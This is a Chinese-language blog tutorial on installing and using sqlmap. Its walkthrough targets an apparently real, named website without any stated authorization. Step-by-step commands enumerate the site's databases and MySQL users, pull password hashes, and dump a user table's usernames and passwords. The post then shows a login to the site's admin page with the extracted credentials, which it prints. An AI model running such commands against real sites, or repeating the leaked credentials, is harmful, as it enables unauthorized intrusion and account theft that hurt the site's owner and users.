渗透测试工具sqlmap基础教程

        我之前只是听过sqlmap这个工具，不会用，对于网络安全人员来说，掌握渗透工具的使用方法是一项必备的技能，后来同学说让我自学使用它，还说是基本都会的，我就自己上网百度，现在我分享一下我所学到的sqlmap渗透工具的使用。

sqlmap的概述：
         sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹，访问底层文件材料系统，执行命令）。并且sqlmap是一款非常强大的开源sql自动化注入工具，可以用来检测和利用sql注入漏洞。它由python语言开发而成，因此运行需要安装python环境。
注意：sqlmap只是用来检测和利用sql注入点的，并不能扫描出网站有哪些漏洞，使用前请先使用扫描工具扫出sql注入点。

python环境和sqlmap的下载与安装
          sqlmap是在Python环境下使用，所以先下载安装Python，Python版本文2.7，下载地址为https://www.python.org/
sqlmap下载地址为https://github.com/sqlmapproject/sqlmap/tarball/master
Python的安装

点现在好的Python文件，可以一直默认，直至安装成功
测试Python环境，出现如下图所示，表示环境安装好了

将下载好的sqlmap压缩文件解压到Python2.7文件夹下

测试sqlmap，cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\sqlmap,切换到sqlmap目录下，输入sqlmap.py –version出现如下图所示，表示安装成功

实战教程：
1.检测注入点是否可用
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47"
参数:-u：指定注入点url


注入结果展示：
（1）注入参数id为GET注入，注入类型有三种分别为：boolean-based blind、time-based blind、union query。
（2）web服务器系统为windows 2008 or 7
（3）web应用程序技术为：ASP.NET, Microsoft IIS 7.5
（4）数据库类型为：MySQL
其中图一有若干询问语句，需要用户输入[Y/N]，如果你懒得输入或者不懂怎么输入可以让程序自动输入，只需添加一个参数即可，命令如下：
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" –batch

2.暴库
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" –dbs
参数：–dbs：dbs前面有两条杠

结果显示该MySQL中共包含2个可用的数据库。

3.web当前使用的数据库
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" –current-db

4.web数据库使用账户
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" –current-user

5.列出MySQL所有用户
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" –users

6.数据库账户与密码
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" –passwords

7.列出数据库中的表
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" -D a1109102224seb –tables
参数: -D指定数据库名称 –tables列出表

8.列出表中字段
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" -D a1109102224seb -T user –columns
参数：-D：指定数据库名称 -T：指定要列出字段的表 –columns：指定列出字段

9.暴字段内容
python sqlmap.py -u “http://www.kmxycm.com/thi_details.php?id=47" -D a1109102224seb -T user -C “id，username，password” –dump
参数：-C ：指定要暴的字段 –dump：将结果导出

10.利用得到的用户和密码登录测试下
浏览器中输入http://www.kmxycm.com/login.php

11.输入用户名lmadmin 密码lmadmin,验证码随机，得到如下结果